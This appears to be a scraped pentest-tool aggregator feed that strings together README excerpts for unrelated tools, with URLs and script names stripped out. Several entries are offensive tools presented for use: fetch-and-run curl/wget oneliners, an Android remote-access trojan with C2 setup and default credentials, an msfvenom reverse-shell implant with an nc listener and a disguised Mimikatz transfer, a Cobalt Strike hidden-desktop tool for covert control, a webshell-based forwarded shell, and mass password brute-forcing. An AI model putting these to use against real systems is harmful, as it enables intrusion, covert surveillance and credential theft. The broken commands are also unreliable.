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Linux-Smart-Enumeration - Linux Enumeration Tool For Pentesting And CTFs With Verbosity Levels

By: Zion3R — May 19th 2024 at 00:42

First, a couple of useful oneliners ;)

wget "" -O;chmod 700
curl "" -Lo;chmod 700

Note that since version 2.10 you can serve the script to other hosts with the -S flag!


Linux enumeration tools for pentesting and CTFs

This project was inspired by and uses many of its tests.

Unlike LinEnum, lse tries to gradualy expose the information depending on its importance from a privesc point of view.

What is it?

This shell script will show relevant information about the security of the local Linux system, helping to escalate privileges.

From version 2.0 it is mostly POSIX compliant and tested with shellcheck and posh.

It can also monitor processes to discover recurrent program executions. It monitors while it is executing all the other tests so you save some time. By default it monitors during 1 minute but you can choose the watch time with the -p parameter.

It has 3 levels of verbosity so you can control how much information you see.

In the default level you should see the highly important security flaws in the system. The level 1 (./ -l1) shows interesting information that should help you to privesc. The level 2 (./ -l2) will just dump all the information it gathers about the system.

By default it will ask you some questions: mainly the current user password (if you know it ;) so it can do some additional tests.

How to use it?

The idea is to get the information gradually.

First you should execute it just like ./ If you see some green yes!, you probably have already some good stuff to work with.

If not, you should try the level 1 verbosity with ./ -l1 and you will see some more information that can be interesting.

If that does not help, level 2 will just dump everything you can gather about the service using ./ -l2. In this case you might find useful to use ./ -l2 | less -r.

You can also select what tests to execute by passing the -s parameter. With it you can select specific tests or sections to be executed. For example ./ -l2 -s usr010,net,pro will execute the test usr010 and all the tests in the sections net and pro.

Use: ./ [options]

-c Disable color
-i Non interactive mode
-h This help
-l LEVEL Output verbosity level
0: Show highly important results. (default)
1: Show interesting results.
2: Show all gathered information.
-s SELECTION Comma separated list of sections or tests to run. Available
usr: User related tests.
sud: Sudo related tests.
fst: File system related tests.
sys: System related tests.
sec: Security measures related tests.
ret: Recurren tasks (cron, timers) related tests.
net: Network related tests.
srv: Services related tests.
pro: Processes related tests.
sof: Software related tests.
ctn: Container (docker, lxc) related tests.
cve: CVE related tests.
Specific tests can be used with their IDs (i.e.: usr020,sud)
-e PATHS Comma separated list of paths to exclude. This allows you
to do faster scans at the cost of completeness
-p SECONDS Time that the process monitor will spend watching for
processes. A value of 0 will disable any watch (default: 60)
-S Serve the script in this host so it can be retrieved
from a remote host.

Is it pretty?

Usage demo

Also available in webm video

Level 0 (default) output sample

Level 1 verbosity output sample

Level 2 verbosity output sample


Direct execution oneliners

bash <(wget -q -O - "") -l2 -i
bash <(curl -s "") -l1 -i

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Moukthar - Android Remote Administration Tool

By: Zion3R — March 2nd 2024 at 11:30

Remote adminitration tool for android

  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

  • Clone repository console git clone
  • Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install The default credentials are username: android and password: the rastafarian in you
  • Set database credentials in c2-server/.env and web socket/.env
  • Execute database.sql
  • Start web socket server or deploy as service in linux console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
  • Modify /etc/apache2/apache2.conf xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
  • Set C2 server and web socket server address in client functionality/ ```java public static final String C2_SERVER = "http://localhost";

public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target

  • Auto scroll logs on dashboard

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RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program

By: Zion3R — March 1st 2024 at 11:30

A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.

About RKS (RemoteKeyStrokes)

All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop.

Help Menu
$ ./ -h
Usage: ./ (RemoteKeyStrokes)
-c, --command <command | cmdfile> Specify a command or a file containing to execute
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
-m, --method <method> Specify the file transfer or execution method
(For file transfer "base64" is set by default if
not specified. For execution method "none" is set
by default if not specified)

-p, --platform <operating_system> Specify the operating system (windows is set by
default if not specified)

-w, --windowname <name> Specify t he window name for graphical remote
program (freerdp is set by default if not

-h, --help Display this help message


Internal Reconnaissance
  • When running in command prompt
$ cat recon_cmds.txt
whoami /all
net user
net localgroup Administrators
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain

$ ./rks.h -c recon_cmds.txt

Execute Implant
  • Execute an implant while reading the contents of the payload in powershell.
$ msfvenom -p windowx/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1

$ ./ -c implant.ps1

$ nc -lvnp 4444

File Transfer
  • Transfer a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes.
$ ./ -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1

$ ./ -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64

Specify Grapical Remote Software
  • If you're targeting VNC network protocols you can specify the window name with tightvnc.

$ ./ -i implant.ps1 -w tightvnc

  • If you're targeting legacy operating systems with older RDP authentication specify the window name with rdesktop.

$ ./ -i implant.bat -w rdesktop

TODO and Help Wanted
  • Add text colors for better user experience

  • Implement Base64 file transfer

  • Implement Bin2Hex file transfer

  • Implement a persistence function for both windows and linux.

  • Implement antiforensics function for both windows and linux.

  • Implement to read shellcode input and run C# implant and powershell runspace

  • Implement privesc function for both windows and linux



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HiddenDesktop - HVNC For Cobalt Strike

By: Zion3R — November 29th 2023 at 11:30

Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.

There are four components of Hidden Desktop:

  1. BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.

  2. HVNC shellcode: PIC implementation of TinyNuke HVNC.

  3. Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.

  4. Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.


Download the latest release or compile yourself using make. Start the HVNC server on a Windows machine accessible from the teamserver. You can then execute the client with:

HiddenDesktop <server> <port>

You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:


You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:

hd-launch <command> [args]



Implementation Details

  1. The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. The desktop name is stored in CS preferences at execution and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using rportfwd. Status updates are sent back to Beacon through a named pipe.
  2. The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the InputHandler function in the HVNC shellcode. It uses BeaconInjectProcess to execute the shellcode, meaning the behavior can be customized in a Malleable C2 profile or with process injection BOFs. You could modify Hidden Desktop to target remote processes, but this is not currently supported. This is done so the BOF can exit and the HVNC shellcode can continue running.
  3. InputHandler creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (OpenDesktopA) or created (CreateDesktopA). A new socket is established through a reverse port forward (rportfwd) to the HVNC server. The input handler creates a new thread for the DesktopHandler function described below. This thread will receive mouse and keyboard input from the HVNC server and forward it to the desktop.
  4. DesktopHandler establishes an additional socket connection to the HVNC server through the reverse port forward. This thread will monitor windows for changes and forward them to the HVNC server.


The HiddenDesktop BOF was tested using example.profile on the following Windows versions/architectures:

  • Windows Server 2022 x64
  • Windows Server 2016 x64
  • Windows Server 2012 R2 x64
  • Windows Server 2008 x86
  • Windows 7 SP1 x64

Known Issues

  • The start menu is not functional.


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Polaris - Validation Of Best Practices In Your Kubernetes Clusters

By: Zion3R — July 2nd 2023 at 12:30

Polaris is an open source policy engine for Kubernetes

Polaris is an open source policy engine for Kubernetes that validates and remediates resource configuration. It includes 30+ built in configuration policies, as well as the ability to build custom policies with JSON Schema. When run on the command line or as a mutating webhook, Polaris can automatically remediate issues based on policy criteria.

Polaris can be run in three different modes:

  • As a dashboard - Validate Kubernetes resources against policy-as-code.
  • As an admission controller - Automatically reject or modify workloads that don't adhere to your organization's policies.
  • As a command-line tool - Incorporate policy-as-code into the CI/CD process to test local YAML files.

Validation of best practices in your Kubernetes clusters (6)


Check out the documentation at

Join the Fairwinds Open Source Community

The goal of the Fairwinds Community is to exchange ideas, influence the open source roadmap, and network with fellow Kubernetes users. Chat with us on Slack or join the user group to get involved!

Other Projects from Fairwinds

Enjoying Polaris? Check out some of our other projects:

  • Goldilocks - Right-size your Kubernetes Deployments by compare your memory and CPU settings against actual usage
  • Pluto - Detect Kubernetes resources that have been deprecated or removed in future versions
  • Nova - Check to see if any of your Helm charts have updates available
  • rbac-manager - Simplify the management of RBAC in your Kubernetes clusters

Or check out the full list

Fairwinds Insights

If you're interested in running Polaris in multiple clusters, tracking the results over time, integrating with Slack, Datadog, and Jira, or unlocking other functionality, check out Fairwinds Insights, a platform for auditing and enforcing policy in Kubernetes clusters.

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Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R — June 21st 2023 at 12:30

This tools is very helpful for finding vulnerabilities present in the Web Applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze


Phase 1

  • User has to write:- "python3 (https or http) ://"
  • At first program will note initial time of running, then it will make url with "".
  • After this step system will check the internet connection using ping.
  • Functionalities:-
    • To navigate to helper menu write this command:- --help for update --update
    • If user want to skip current scan/test:- CTRL+C
    • To quit the scanner use:- CTRL+Z
    • The program will tell scanning time taken by the tool for a specific test.

Phase 2

  • From here the main function of scanner will start:
  • The scanner will automatically select any tool to start scanning.
  • Scanners that will be used and filename rotation (default: enabled (1)
  • Command that is used to initiate the tool (with parameters and extra params) already given in code
  • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system


  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical


  • After this scanner will show results which inclues:
    • Response time
    • Total time for scanning
    • Class of vulnerability


  • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
  • Scanner tell about sources to know more about the vulnerabilities. (websites).
  • After this step, scanner suggests some remdies to overcome the vulnerabilites.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerabilites.
  • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
  • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.


Use Program as python3 (https or http) ://
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection


git clone
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner


Template contributions , Feature Requests and Bug Reports are more than welcome.


GitHub: @Malwareman007
GitHub: @Riya73


Contributions, issues and feature requests are welcome!
Feel free to check issues page.

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Leaktopus - Keep Your Source Code Under Control

By: (Unknown) — February 10th 2023 at 11:30

Keep your source code under control.

Key Features

  • Plug&Play - one line installation with Docker.

  • Scan various sources containing a set of keywords, e.g.

    Currently supports:

    • GitHub
      • Repositories
      • Gists (coming soon)
    • Paste sites (e.g., PasteBin) (coming soon)
  • Filter results with a built-in heuristic engine.

  • Enhance results with IOLs (Indicators Of Leak):

    • Secrets in the found sources (including Git repos commits history):
    • URIs (Including indication of your organization's domains)
    • Emails (Including indication of your organization's email addresses)
    • Contributors
    • Sensitive keywords (e.g., canary token, internal domains)
  • Allows to ignore public sources, (e.g., "junk" repositories by web crawlers).

  • OOTB ignore list of common "junk" sources.

  • Acknowledge a leak, and only get notified if the source has been modified since the previous scan.

  • Built-in ELK to search for data in leaks (including full index of Git repositories with IOLs).

  • Notify on new leaks

    • MS Teams Webhook.
    • Slack Bot.
    • Cortex XSOAR® (by Palo Alto Networks) Integration (WIP).

Technology Stack

  • Fully Dockerized.
  • API-first Python Flask backend.
  • Decoupled Vue.js (3.x) frontend.
  • SQLite DB.
  • Async tasks with Celery + Redis queues.


  • Docker-Compose


  • Clone the repository
  • Create a local .env file
    cd Leaktopus
    cp .env.example .env
  • Edit .env according to your local setup (see the internal comments).
  • Run Leaktopus
    docker-compose up -d
  • Initiate the installation sequence by accessing the installation API. Just open http://{LEAKTOPUS_HOST}:8000/api/install in your browser.
  • Check that the API is up and running at http://{LEAKTOPUS_HOST}:8000/up
  • The UI should be available at http://{LEAKTOPUS_HOST}:8080

Using Github App

In addition to the basic personal access token option, Leaktopus supports Github App authentication. Using Github App is recommended due to the increased rate limits.

  1. To use Github App authentication, you need to create a Github App and install it on your organization/account. See Github's documentation for more details.

  2. After creating the app, you need to set the following environment variables:

    • GITHUB_INSTALLATION_ID - The installation id can be found in your app installation.
    • GITHUB_APP_PRIVATE_KEY_PATH (defaults to /app/private-key.pem)
  3. Mount the private key file to the container (see docker-compose.yml for an example). ./leaktopus_backend/private-key.pem:/app/private-key.pem

* Note that GITHUB_ACCESS_TOKEN will be ignored if GITHUB_USE_APP is set to True.

Updating Leaktopus

If you wish to update your Leaktopus version (pulling a newer version), just follow the next steps.

  • Pull the latest version.
    git pull
  • Rebuild Docker images (data won't be deleted).
    # Force image recreation
    docker-compose up --force-recreate --build
  • Run the DB update by calling its API (should be required after some updates). http://{LEAKTOPUS_HOST}/api/updatedb

Results Filtering Heuristic Engine

The built-in heuristic engine is filtering the search results to reduce false positives by:

  • Content:
    • More than X emails containing non-organizational domains.
    • More than X URIs containing non-organizational domains.
  • Metadata:
    • More than X stars.
    • More than X forks.
  • Sources ignore list.

API Documentation

OpenAPI documentation is available in http://{LEAKTOPUS_HOST}:8000/apidocs.

Leaktopus Services

Service Port Mandatory/Optional
Backend (API) 8000 Mandatory
Backend (Worker) N/A Mandatory
Redis 6379 Mandatory
Frontend 8080 Optional
Elasticsearch 9200 Optional
Logstash 5000 Optional
Kibana 5601 Optional

The above can be customized by using a custom docker-compose.yml file.

Security Notes

As for now, Leaktopus does not provide any authentication mechanism. Make sure that you are not exposing it to the world, and doing your best to restrict access to your Leaktopus instance(s).


Contributions are very welcomed.

Please follow our contribution guidelines and documentation.

☐ ☆ ✇ KitPloit - PenTest Tools!

DFShell - The Best Forwarded Shell

By: (Unknown) — January 30th 2023 at 11:30

██████╗ ███████╗███████╗██╗  ██╗███████╗██╗     ██╗     
██╔══██╗██╔════╝██╔════╝██║ ██║███╔═══╝██║ ██║
██║ ██║█████╗ ███████╗███████║█████╗ ██║ ██║
██║ ██║██╔══╝ ╚════██║██╔══██║██╔══╝ ██║ ██║
██████╔╝██║ ███████║██║ ██║███████╗████████╗███████╗
╚═════╝ ╚═╝ ╚══════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝

D3Ext's Forwarded Shell it's a python3 script which use mkfifo to simulate a shell into the victim machine. It creates a hidden directory in /dev/shm/.fs/ and there are stored the fifos. You can even have a tty over a webshell.

In case you want a good webshell with code obfuscation, login panel and more functions you have this webshell (scripted by me), you can change the username and the password at the top of the file, it also have a little protection in case of beeing discovered because if the webshell is accessed from localhost it gives a 404 status code

Why you should use DFShell?

To use other forwarded shells you have to edit the script to change the url and the parameter of the webshell, but DFShell use parameters to quickly pass the arguments to the script (-u/--url and -p/--parameter), the script have a pretty output with colors, you also have custom commands to upload and download files from the target, do port and host discovery, and it deletes the files created on the victim if you press Ctrl + C or simply exit from the shell.

*If you change the actual user from webshell (or anything get unstable) then execute: 'sh'*


Install with pip

pip3 install dfshell

Install from source

git clone
cd DFShell
pip3 install -r requirements


git clone && cd DFShell && pip3 install -r requirements


It's simple, you pass the url of the webshell and the parameter that executes commands. I recommend you the most simple webshell

python3 -u -p cmd


☐ ☆ ✇ KitPloit - PenTest Tools!

OFRAK - Unpack, Modify, And Repack Binaries

By: (Unknown) — December 25th 2022 at 11:30

OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:

  • Identify and Unpack many binary formats
  • Analyze unpacked binaries with field-tested reverse engineering tools
  • Modify and Repack binaries with powerful patching strategies

OFRAK supports a range of embedded firmware file formats beyond userspace executables, including:

  • Compressed filesystems
  • Compressed & checksummed firmware
  • Bootloaders
  • RTOS/OS kernels

OFRAK equips users with:

  • A Graphical User Interface (GUI) for interactive exploration and visualization of binaries
  • A Python API for readable and reproducible scripts that can be applied to entire classes of binaries, rather than just one specific binary
  • Recursive identification, unpacking, and repacking of many file formats, from ELF executables, to filesystem archives, to compressed and checksummed firmware formats
  • Built-in, extensible integration with powerful analysis backends (angr, Binary Ninja, Ghidra, IDA Pro)
  • Extensibility by design via a common interface to easily write additional OFRAK components and add support for a new file format or binary patching operation

See for more details.

GUI Frontend

The web-based GUI view provides a navigable resource tree. For the selected resource, it also provides: metadata, hex or text navigation, and a mini map sidebar for quickly navigating by entropy, byteclass, or magnitude. The GUI also allows for actions normally available through the Python API like commenting, unpacking, analyzing, modifying and packing resources.

Getting Started

OFRAK uses Git LFS. This means that you must have Git LFS installed before you clone the repository! Install Git LFS by following the instructions here. If you accidentally cloned the repository before installing Git LFS, cd into the repository and run git lfs pull.

See docs/environment-setup for detailed instructions on how to install OFRAK.


OFRAK has general documentation and API documentation. Both can be viewed at

If you wish to make changes to the documentation or serve it yourself, follow the directions in docs/


The code in this repository comes with an OFRAK Community License, which is intended for educational uses, personal development, or just having fun.

Users interested in OFRAK for commercial purposes can request the Pro License, which for a limited period is available for a free 6-month trial. See OFRAK Licensing for more information.


Red Balloon Security is excited for security researchers and developers to contribute to this repository.

For details, please see our contributor guide and the Python development guide.


Please contact, or write to us on the OFRAK Slack with any questions or issues regarding OFRAK. We look forward to getting your feedback! Sign up for the OFRAK Mailing List to receive monthly updates about OFRAK code improvements and new features.

This material is based in part upon work supported by the DARPA under Contract No. N66001-20-C-4032. Any opinions, findings and conclusions or recommendations expressed in this material are those of the author(s) and do not necessarily reflect the views of the DARPA. Distribution Statement “A” (Approved for Public Release, Distribution Unlimited).

☐ ☆ ✇ KitPloit - PenTest Tools!

Slicer - Tool To Automate The Boring Process Of APK Recon

By: (Unknown) — November 18th 2022 at 11:30

A tool to automate the recon process on an APK file.

Slicer accepts a path to an extracted APK file and then returns all the activities, receivers, and services which are exported and have null permissions and can be externally provoked.

Note: The APK has to be extracted via jadx or apktool.



I started bug bounty like 3 weeks ago(in June 2020) and I have been trying my best on android apps. But I noticed one thing that in all the apps there were certain things which I have to do before diving in deep. So I just thought it would be nice to automate that process with a simple tool.

Why not drozer?

Well, drozer is a different beast. Even though it does finds out all the accessible components but I was tired of running those commands again and again.

Why not automate using drozer?

I actually wrote a bash script for running certain drozer commands so I won't have to run them manually but there was still some boring stuff that had to be done. Like Checking the strings.xml for various API keys, testing if firebase DB was publically accessible or if those google API keys have setup any cap or anything on their usage and lot of other stuff.

Why not search all the files?

I think that a tool like grep or ripgrep would be much faster to search through all the files. So if there is something specific that you want to search it would be better to use those tools. But if you think that there is something which should be checked in all the android files then feel free to open an issue.


  • Check if the APK has set the android:allowbackup to true

  • Check if the APK has set the android:debuggable to true.

  • Return all the activities, services and broadcast receivers which are exported and have null permission set. This is decided on the basis of two things:

    • android:exporte=true is present in any of the component and have no permission set.
    • If exported is not mention then slicer check if any Intent-filters are defined for that component, if yes that means that component is exported by default(This is the rule given in android documentation.)
  • Check the Firebase URL of the APK by testing it for .json trick.

    • If the firebase URL is then it will check if returns something or gives permission denied.
    • If this thing is open then that can be reported as high severity.
  • Check if the google API keys are publically accessible or not.

    • This can be reported on some bounty programs but have a low severity.
    • But most of the time reporting this kind of thing will bring out the pain of Duplicate.
    • Also sometimes the company can just close it as not applicable and will claim that the KEY has a usage cap - r/suspiciouslyspecific
  • Return other API keys that are present in strings.xml and in AndroidManifest.xml

  • List all the file names present in /res/raw and res/xml directory.

  • Extracts all the URLs and paths.

    • These can be used with tool like dirsearch or ffuf.


  • Clone this repository
git clone
  • cd slicer
  • Now you can run it: python3 -h


It's very simple to use. Following options are available:

Extract information from Manifest and strings of an APK

slicer [OPTION] [Extracted APK directory]


-d, --dir path to jadx output directory
-o, --output Name of the output file(not implemented)

I have not implemented the output flag yet because I think if you can redirect slicer output to a yaml file it will a proper format.

Usage Example

  • Extract information from the APK and display it on the screen.
python3 -d path/to/extact/apk -c config.json

Acknowledgements and Credits

The extractor module used to extract URLs and paths is taken from apkurlgrep by @ndelphit


All the features implemented in this are things that I've learned in past few weeks, so if you think that there are various other things which should be checked in an APK then please open an issue for that feature and I'd be happy to implement that :)


If you'd like you can buy me some coffee:

☐ ☆ ✇ KitPloit - PenTest Tools!

Scan4All - Vuls Scan: 15000+PoCs; 21 Kinds Of Application Password Crack; 7000+Web Fingerprints; 146 Protocols And 90000+ Rules Port Scanning; Fuzz, HW, Awesome BugBounty...

By: (Unknown) — September 28th 2022 at 11:30

  • What is scan4all: integrated vscan, nuclei, ksubdomain, subfinder, etc., fully automated and intelligent。red team tools Code-level optimization, parameter optimization, and individual modules, such as vscan filefuzz, have been rewritten for these integrated projects. In principle, do not repeat the wheel, unless there are bugs, problems
  • Cross-platform: based on golang implementation, lightweight, highly customizable, open source, supports Linux, windows, mac os, etc.
  • Support [21] password blasting, support custom dictionary, open by "priorityNmap": true
    • RDP
    • SSH
    • rsh-spx
    • Mysql
    • MsSql
    • Oracle
    • Postgresql
    • Redis
    • FTP
    • Mongodb
    • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE- 2020-0796)
    • Telnet
    • Snmp
    • Wap-wsp (Elasticsearch)
    • RouterOs
    • HTTP BasicAuth
    • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
    • Tomcat
    • Jboss
    • Winrm(wsman)
    • POP3
  • By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
  • Detect whether there is nmap in the system, and enable nmap for fast scanning through priorityNmap=true, which is enabled by default, and the optimized nmap parameters are faster than masscan Disadvantages of using nmap: Is the network bad, because the traffic network packet is too large, which may lead to incomplete results Using nmap additionally requires setting the root password to an environment variable

  export PPSSWWDD=yourRootPswd 

More references: config/ By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true
./scan4all -l nmapRssuilt.xml -v
  • Fast 15000+ POC detection capabilities, PoCs include:
    • nuclei POC

    Nuclei Templates Top 10 statistics

cve 1294 daffainfo 605 cves 1277 info 1352 http 3554
panel 591 dhiyaneshdk 503 exposed-panels 600 high 938 file 76
lfi 486 pikpikcu 321 vulnerabilities 493 medium 766 network 50
xss 439 pdteam 269 technologies 266 critical 436 dns 17
wordpress 401 geeknik 187 exposures 254 low 211
exposure 355 dwisiswant0 169 misconfiguration 207 unknown 7
cve2021 322 0x_akoko 154 token-spray 206
rce 313 princechaddha 147 workflows 187
wp-plugin 297 pussycat0x 128 default-logins 101
tech 282 gy741 126 file 76

281 directories, 3922 files.

  • vscan POC
    • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
  • scan4all POC
  • Support 7000+ web fingerprint scanning, identification:

    • httpx fingerprint
      • vscan fingerprint
      • vscan fingerprint: including eHoleFinger, localFinger, etc.
    • scan4all fingerprint
  • Support 146 protocols and 90000+ rule port scanning

    • Depends on protocols and fingerprints supported by nmap
  • Fast HTTP sensitive file detection, can customize dictionary

  • Landing page detection

  • Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

  • Supports multiple output types - JSON/TXT/CSV/STDOUT

  • Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

  • Smart SSL Analysis:

    • In-depth analysis, automatically correlate the scanning of domain names in SSL information, such as *, and complete subdomain traversal according to the configuration, and the result will automatically add the target to the scanning list
    • Support to enable * subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file
  • Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

  • Smart processing:

      1. When the IPs of multiple domain names in the list are the same, merge port scans to improve efficiency
      1. Intelligently handle http abnormal pages, and fingerprint calculation and learning
  • Automated supply chain identification, analysis and scanning

  • Link python3 log4j-scan

    • This version blocks the bug that your target information is passed to the DNS Log Server to avoid exposing vulnerabilities
    • Added the ability to send results to Elasticsearch for batch, touch typing
    • There will be time in the future to implement the golang version how to use?
mkdir ~/MyWork/;cd ~/MyWork/;git clone
  • Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

  • Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

  • support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr 

  • Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process

how to install

download from Releases

go install
scan4all -h

how to use

    1. Start Elasticsearch, of course you can use the traditional way to output, results
mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately

# Search syntax, more query methods, learn Elasticsearch by yourself
where is the target to query
  • Please install nmap by yourself before use Using Help
go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

  • Integrate web-cache-vulnerability-scanner to realize HTTP smuggling smuggling and cache poisoning detection
  • Linkage with metasploit-framework, on the premise that the system has been installed, cooperate with tmux, and complete the linkage with the macos environment as the best practice
  • Integrate more fuzzers , such as linking sqlmap
  • Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
  • Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
  • Integrate ksubdomain to achieve faster subdomain blasting
  • Integrate spider to find more bugs
